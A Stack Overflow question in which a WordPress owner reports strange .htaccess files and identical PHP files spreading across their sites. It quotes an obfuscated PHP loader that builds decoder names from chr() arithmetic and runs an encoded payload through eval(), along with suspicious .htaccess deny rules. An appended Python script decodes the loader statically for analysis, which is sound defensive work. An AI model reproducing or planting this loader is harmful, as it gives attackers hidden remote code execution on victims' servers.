Channel: Recent Questions - Stack Overflow

I have a strange PHP file that appeared throughout my different WordPress websites in cPanel's file manager


I have a question similar to what is said in this unanswered topic here:

There is an unwanted .htaccess file with "Order Allow,Deny" in all my wordpress subfolders

with some of this one here:

Admin links shows 404 WordPress

Meaning that I found different unwanted htaccess files (or rather, files that I don't recall placing there) in the different WordPress folders in my cPanel file manager. I don't know if it's related, but when I access the wp-admin of different websites I can't get to the plugins interface or media from the dashboard because I get a 404 not found. Some files are named like "htaccess.ht" or "htaccess.bk" and look like this:

    RewriteEngine On
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]

Or like this:

    <FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8|pHP7|PHP7|php58)$">
    Order allow,deny
    Deny from all
    </FilesMatch>
    <FilesMatch "^(index.php|credits.php|customize.php|edit-comments.php|edit-tags.php|edit.php|checkbox.php|export.php|input.php|link.php|load-scripts.php|load-styles.php|dropdown.php|menu.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|plugins.php|post-new.php|post.php|privacy.php|profile.php|site-health.php|term.php|text.php|themes.php|tools.php|update-core.php|user-edit.php|user-new.php|users.php|wp-links.php|wp-login.php|wp-signup.php)$">
    Order allow,deny
    Allow from all
    </FilesMatch>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>

It doesn't look like too much of a threat, but it still begs the question...

Stranger than that, different PHP files with different names have appeared all around, always with the same code inside:

    <?php
    $co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
    $na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
    $ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
    $AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d";
    $AmineDns = "=UvmLf1PNqJF8Isk5oJJuCJbUnKE6V8MRlbdTH+LGS1rsNXfL7l+n7Z/zCc/0x76Pb1S4Q1gnj2KXGz/67Id57kEDyc1UpM29Srl73G1iNKDVNmu7vb7KPTX1aFGuy1qdMbXq2KT3Mvry4TdSwScm1FI4ybP1C1NMqU4iVsCWrvML+PbemQVOpQ5WlDCgHIEr7ZEbVBmpjAGy7IQXGT8XiUlC2q8XcDgRViOGxnYZuAk7ADk8C+gCMl7PC9uHb3PKh96n88SVENqonNW/EHNrC2Rq4wrfCiJY+UaAYFm0ug+o/MgNITG3hZaGicIMZr7WoQqam/s1YOlD3L5CMdMzq7gaQmvzeW6AMZB2zDB0OM+AY6CnGgqi5C6RwUJSe3WqQmkntsbUehG418D7s3O7MTO4RQkO9O8RKn0UrwQAKXgmSDatIGpPsqaE4CpJi0II1ktawUF8DBUC702QVFn45PoB8VA";
    /*2e3300cd40ea092e5eeb579abe01e85a*/
    eval($co($ro($na($AmInE))));
    exit;
    ?>

When I UnPhp it, it gives me the information below.

Here's the output.

So far:

  • I've tried to use WP_DEBUG but I didn't get any messages related to the 404 error...
  • I cannot add plugins to search for errors because, well... I get a 404 when trying to get to the "add plugin" menu.
  • I've tried getting rid of the unwanted htaccess files and making a new one by going to Tools > Permalinks > Save.
  • In the error_log, I have several attempts of the wp_privacy_delete_old_export_files function that couldn't be sent.
  • I've tried to update everything and reinstall WordPress's latest version, but I also got an error.
  • I've checked the wp-config file, the plugin-install.php file... but found nothing unusual... The worst part is, all my plugins work perfectly, I just... can't reach any dashboard and nothing works...

My question is this: should I be worried? If it's a mod_rewrite problem, I've already contacted cPanel's support and all should be fixed. But still, if anyone can provide me with any information on the issue, it would be really nice of them!

Thank you for taking the time to read
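
Added example, not part of the original question: a static decoder for the first stage of the PHP file quoted above. It resolves the chr() arithmetic and the string escapes, then applies the decoders through an allow-list without running any PHP. SAMPLE is copied from the quoted file with $AmineDns left out; the function and variable names are this example's own.

```python
import base64, html, re
from urllib.parse import unquote_plus

# Stage-1 pieces copied from the PHP file quoted in the question ($AmineDns left out).
SAMPLE = r'''
$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d";
eval($co($ro($na($AmInE))));
'''

# Python stand-ins for the only PHP functions this decoder is willing to apply.
DECODERS = {
    'base64_decode': lambda s: base64.b64decode(s).decode('latin-1'),
    'urldecode': unquote_plus,
    'htmlspecialchars_decode': html.unescape,  # decodes a superset of the PHP function
}
CHR_CALL = re.compile(r'chr\(\s*(\d+(?:\s*[+-]\s*\d+)*)\s*\)')

def eval_sum(expr):
    """Evaluate an integer +/- chain such as '155-36-15' without eval()."""
    return sum(int(tok) for tok in re.findall(r'[+-]?\d+', expr.replace(' ', '')))

def resolve_chr_chain(php_expr):
    """Turn chr(a+b).chr(c-d)... into the string it builds."""
    return ''.join(chr(eval_sum(m.group(1))) for m in CHR_CALL.finditer(php_expr))

def php_unescape(s):
    """Decode the \\NNN octal and \\xHH hex escapes of a PHP double-quoted string."""
    def sub(m):
        return chr(int(m.group(1), 8) & 0xFF) if m.group(1) else chr(int(m.group(2), 16))
    return re.sub(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})', sub, s)

def decode_first_stage(php_src):
    """Return (decoder names, innermost first; decoded text). Nothing is executed."""
    names, strings = {}, {}
    for var, rhs in re.findall(r'\$(\w+)\s*=\s*(.*?);', php_src, re.S):
        rhs = rhs.strip()
        if rhs.startswith('chr('):
            names[var] = resolve_chr_chain(rhs)
        elif rhs.startswith('"'):
            strings[var] = php_unescape(rhs.strip('"'))
    call = re.search(r'eval\(((?:\$\w+\()+)\$(\w+)\)', php_src)
    chain = [names[v] for v in re.findall(r'\$(\w+)\(', call.group(1))][::-1]
    text = strings[call.group(2)]
    for fn in chain:
        text = DECODERS[fn](text)  # KeyError if the file uses a function not listed above
    return chain, text

if __name__ == '__main__':
    print(decode_first_stage(SAMPLE))
```

On the quoted file the three variables resolve to base64_decode, urldecode and htmlspecialchars_decode, and the decoded text is a second eval over the reversed, compressed $AmineDns string. That is a code loader, not a WordPress core file.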

